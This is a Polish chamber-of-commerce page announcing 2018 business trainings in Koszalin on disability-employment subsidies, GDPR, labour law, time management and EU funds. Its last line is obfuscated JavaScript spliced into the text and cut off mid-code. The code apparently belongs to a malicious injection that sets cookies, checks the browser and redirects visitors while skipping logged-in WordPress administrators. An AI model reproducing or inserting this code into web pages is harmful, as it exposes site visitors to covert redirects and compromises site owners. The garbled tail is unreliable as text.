Szkolenia, warsztaty i spotkania informacyjne w Północnej Izbie Gospodarczej! | Północna Izba Gospodarcza w Koszalinie

Zatrudnianie osób niepełnosprawnych (prawa, obowiązki, „przywileje”) + aplikacja e-mikrofirma do wysyłki JPK_VAT

Polnocna-Izba-Koszalin-spotkanie-PFRON

Termin: 21.02.2018
Godzina  11:30, czas trwania 2 godziny
Miejsce: Restauracja Park Caffe, ul.Asnyka 11, Koszalin

Szkolenie przeprowadzą przedstawiciele Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych ze Szczecina.

Zatrudnienie niepełnosprawnego pracownika – dofinansowanie do wynagrodzenia

Pracodawcy, który zatrudnia osoby niepełnosprawne, przysługuje ze środków Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych miesięczne dofinansowanie do wynagrodzeń pracowników niepełnosprawnych, o ile pracownicy ci znajdują się w ewidencji zatrudnionych osób niepełnosprawnych, prowadzonej przez PFRON.

Dofinansowanie przysługuje: każdemu pracodawcy zatrudniającemu osobę niepełnosprawną,

pracodawcy prowadzącemu zakład pracy chronionej, pracodawcy zatrudniającemu co najmniej 25 pracowników w przeliczeniu na pełny wymiar czasu pracy i osiągającemu wskaźnik zatrudnienia osób niepełnosprawnych w wysokości co najmniej 6 % pracodawcom, którzy nie posiadają zaległości w zobowiązaniach wobec Funduszu.

Dofinansowaniem ze środków programu mogą być objęte koszty dotyczące:

 • rekrutacji i rozpoznania potrzeb wynikających z niepełnosprawności,
 • uzyskania przez osobę niepełnosprawną pożądanych kwalifikacji/umiejętności zawodowych oraz pracowniczych,
 • zniwelowania barier uniemożliwiających podjęcie zatrudnienia u potencjalnego pracodawcy (w tym m.in.: sprzętów i urządzeń technicznych, zatrudnienia asystenta lub trenera pracy, dojazdów do pracy,
 • dodatku motywacyjnego rekompensującego podwyższone koszty związane
  z podjęciem aktywności zawodowej osoby niepełnosprawnej,
 • wykorzystania innowacyjnych metod pracy, mających na celu utrzymanie osoby niepełnosprawnej w zatrudnieniu.

Na spotkaniu można będzie uzyskać informacje m.in o:

 • zasady obowiązujące w trakcie naboru i weryfikacji formalnej ofert zatrudnienia osób niepełnosprawnych;
 • zasady zawierania porozumienia z potencjalnymi pracodawcami w sprawie współpracy przy realizacji programu;
 • zasady kwalifikowalności kosztów;
 • zasady przekazywania i rozliczania środków PFRON;
 • zasady ogłaszania konkursów dla pracodawców zatrudniających
  osoby niepełnosprawne.

Spotkanie odbędzie się na podstawie programu pilotażowego „Praca-Integracja”.

Dodatkowo przed spotkaniem informacyjnym o korzyściach z zatrudniania osób z niepełnosprawnością, przedstawiciele Krajowej Administracji Skarbowej przedstawią  działanie programu do elekronicznego składania JPK_VAT w aplikacji e-mikrofirma.
Więcej informacji: http://bit.ly/2Ezw3mV

 

Relacja po spotkaniu: www.pig.koszalin.pl/relacja

Zmiany w RODO – warsztaty dla przedsiębiorców

Polnocna-Izba-warsztaty-dla-przedsiebiorcow-rodo-2018

Termin warsztatów: 6.03.2018
Godzina: 10:00 – 16:00
Miejsce: City Box Koszalin, Rynek Staromiejski 14
Dzięki temu szkoleniu dowiecie się Państwo, jakie zmiany czekają przedsiębiorców i jak się na nie praktycznie przygotować.
Jak należy dostosować organizację do nowych przepisów o ochronie danych osobowych i od czego zacząć proces wdrożeniowy? 
Jak wykonać analizę ryzyka zgodnie przepisami RODO? Jakie wyzwania są stawiane przed administratorem danych osobowych oraz inspektorem ochrony danych (IOD)? 
Co zmieni się dla dotychczasowych administratorów bezpieczeństwa informacji (ABI)?
Dowiecie się również jakie są założenia projektu nowej ustawy o ochronie danych osobowych oraz pierwszych wytycznych do przepisów RODO.

Dla wszystkich uczestników Północna Izba Gospodarcza w Koszalinie zapewnia serwis kawowy oraz lunch.

Zapraszamy na bezpłatne warsztaty dla wszystkich firm zrzeszonych w Północnej Izbie Gospodarczej.
Jeżeli nie jesteście Państwo członkiem zapraszamy do wypełnienia deklaracji przystąpienia. Wszystkie informacje dostępne są pod adresem www.pig.koszalin.pl/jak-przystapic/

Jeżeli chcą Państwo uczestniczyć w warsztatach, bez kwestii formalnych prosimy o kontakt z biurem Północnej Izby Gospodarczej w Koszalinie 943411083 lub 537184630 oraz mailowo  koszalin@izba.info 

Warsztaty poprowadzi adwokat Michał Skwira www.skwira.eu

Więcej informacji: 2018/02/06/zmiany-w-rodo-warsztaty-dla-przedsiebiorcow/

Kierowanie zespołem (jak znaleźć i utrzymać pracownika) – warsztaty

Polnocna-Izba-warsztaty-Kierowanie-zespołem

Termin warsztatów: 21.03.2018
Godziny: 10:00 – 16:00
Miejsce: Restauracja Park Caffe, Asnka 11, Koszalin

Skuteczna komunikacja oraz zarządzanie projektami to podstawa dobrze funkcjonującej firmy. Opóźnienia mogą spowodować problemy w realizacji działań na czas, a co za tym idzie, nawet utratę klienta. Dodatkowo, uporządkowane schematy mogą być znaczącym ułatwieniem pracy członków zespołu. Na warsztatach dowiecie się Państwo, jak zastosować praktyczne metody, po które można sięgnąć chcąc poprawić wydajność zespołu poprzez wprowadzenie odpowiedniej komunikacji.

Szkolenie 6 godzinne, poparte dużą ilością casy studies, dedykowane osobom budującym nowy zespół oraz managerom napotykającym na opór w zarządzanej przez siebie grupie.

Na warsztatach zostaną poruszone zagadnienia związane m.in. z:

 • Komunikacja w zespole jako narzędzie kierowania
 • Asertywne egzekwowanie zadań przez szefa
 • System wartości „szefa” (oczekiwania i wymagania stawiane pracownikom)
 • Motywacja pozafinansowa, a finansowa – co działa skuteczniej? ( motywatory miękkie, czego oczekuje pracownik? Nagroda, czy kara – co jest skuteczniejsze ?
Aktualności w zakresie prawa pracy i kontroli PIP – szkolenie
 Polnocna-Izba-szkolenie-prawo-pracy
Termin warsztatów: 12.04.2018
Godziny: 10:00 – 13:00
Miejsce: Restauracja Maredo, Zwycięstwa 45, Koszalin

Zapraszamy wszystkich przedsiębiorców  na szkolenie z zakresu prawa pracy oraz kontroli PIP w tym zakresie. Szkolenie skierowane jest do pracodawców, a także przedsiębiorców powierzających wykonywanie pracy na innej podstawie niż umowa o pracę oraz służb kadrowych zakładów pracy. Szkolenie poprowadzi wyjątkowy ekspert – Pani Małgorzata Klowan, były pracownik Państwowej Inspekcji Pracy.

Głównym założeniem szkolenia jest przybliżenie w przystępny sposób zagadnień prawa pracy oraz wskazanie możliwości sprawnego zastosowania zmieniających się przepisów w codziennym funkcjonowaniu zakładu pracy. Szkolenie ma na celu wyjaśnienie ostatnich zmian przepisów nie tylko od strony teoretycznej, poprzez przytoczenie ich brzmienia, ale przede wszystkich ma wskazać drogę praktyczną w prawidłowym ich stosowaniu. Ponadto, z racji doświadczenia zawodowego, prowadzący przybliży zagadnienia związane z kontrolą przestrzegania prawa pracy prowadzoną przez Państwową Inspekcję Pracy oraz wskaże drogi zgodnego z prawem przejścia przez procedury kontrolne.

Więcej informacji o szkoleniu: 2018/02/27/szkolenie-z-zakresu-prawa-pracy-oraz-kontroli-pip/

Zmiany w RODO – warsztaty dla przedsiębiorców

Polnocna-Izba-warsztaty-dla-przedsiebiorcow-rodo-2018

W związku z dużym zainteresowaniem w temacie RODO, organizujemy drugą edycję!

Termin warsztatów: 18.04.2018
Godzina: 9:00 – 12:30
Miejsce: City Box Koszalin, Rynek Staromiejski 14

 

Zapraszamy na bezpłatne warsztaty dla wszystkich firm zrzeszonych w Północnej Izbie Gospodarczej.
Jeżeli nie jesteście Państwo członkiem zapraszamy do wypełnienia deklaracji przystąpienia. Wszystkie informacje dostępne są pod adresem www.pig.koszalin.pl/jak-przystapic/

Jeżeli chcą Państwo uczestniczyć w warsztatach, bez kwestii formalnych prosimy o kontakt z biurem Północnej Izby Gospodarczej w Koszalinie 943411083 lub 537184630 oraz mailowo  koszalin@izba.info 

Warsztaty poprowadzi adwokat Michał Skwira www.skwira.eu

 Zarządzanie czasem – organizacja pracy w przedsiębiorstwie – warsztaty

Polnocna-Izba-warsztaty-organizacja-pracy

Termin warsztatów: 25.04.2018
Godziny: 10:00 – 16:00
Miejsce: w trakcie ustaleń
W natłoku obowiązków wydaje się nam, że nasz dzień jest zbyt krótki. Nie jest tak. Doba dla każdego ma 24 godziny i od sprawnego zagospodarowania czasu zależy, ile zadań zdołamy wykonać. Na warsztatach zostaną przekazane Państwu sposoby jak efektywnie zarządzać swoim czasem pracy.
Cel szkolenia:
Wypracowanie umiejętności zarządzania sobą w czasie i planowania
własnej pracy.
Rozwój umiejętności wpływających na podniesienie wśród menedżerów satysfakcji z pracy, rozwój kluczowych umiejętności sprawnego zarządzania zespołem, oraz umiejętności delegowania zadań. Rozwój metod zarządzania czasem , które doprowadzą do efektywnego realizowania wyznaczonych celów.
Korzyści dla uczestników
Po zakończonym szkoleniu uczestnicy powinni umieć zastosować następujące umiejętności:
– wiedzieć, co wpływa na organizację pracy własnej
– umieć definiować cele i ustalać priorytety realizowanych zadań
– znać i umieć zastosować narzędzia pracy podnoszące efektywność
– przygotowywać efektywne spotkania
– umieć znaleźć indywidualne rozwiązania na eliminację
„ pożeraczy” czasu
– wiedzieć komu i co delegować oraz jak kontrolować wyniki powierzonych prac
Szkolenie 6 godzinne, poparte dużą ilością casy studies, dedykowane osobom budującym nowy zespół oraz managerom napotykającym na opór w zarządzanej przez siebie grupie.
Dofinansowanie przedsiębiorstw z Funduszy Europejskich
Termin warsztatów: 09.05.2018
Godziny: 12:00 – 14:30
Miejsce: Hotel Gromada, Zwycięstwa 20-24, Koszalin

Na spotkanie zapraszamy wszystkich zainteresowanych tematyką Funduszy Europejskich, a w szczególności przedsiębiorców, którzy chcą pozyskać środki na rozwój działalności gospodarczej oraz planują podnieść kwalifikacje swoje lub swoich pracowników, biorąc udział w dofinansowanych szkoleniach i kursach.

Spotkanie informacyjne ma za zadnienie doradztwo przedsiębiorcom nie tylko jak skutecznie pozyskać dotację, ale też jak poprawnie zrealizować inwestycję i rozliczyć projekt tak, by otrzymać dofinansowanie.

Oferujemy Państwu informację dotyczące wyszukiwania, pozyskiwania oraz rozliczania pomocy finansowej z Funduszy Europejskich – wsparcie finansowe ze środków Unii Europejskiej, w postaci bezzwrotnej dotacji. Na spotkaniu zostaną poruszone kwestie:

 • wyboru odpowiedniego programu wsparcia,
 • przygotowania projektu kwalifikującego się do pozyskania dotacji UE,
 • opracowywania wniosków,
 • opracowywania biznes planów i studium wykonalności,
 • sporządzenia stosownych analiz i ekspertyz związanych z planowanym projektem.

Zapraszamy Państwa na spotkanie, na którym otrzymają Państwo wstępne informacje na temat:

 • możliwości współfinansowania projektów,
 • harmonogramu istotnych konkursów,
 • dokumentów niezbędnych do opracowania, także dokumentów typu analizy, raporty.

 

Potwierdzenia obecności prosimy wysyłać na adres koszalin@izba.info lub telefonicznie pod numer 537 184 630.

Jeżeli podane godziny szkoleń Państwu nie odpowiadają, bardzo prosimy o informację. 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m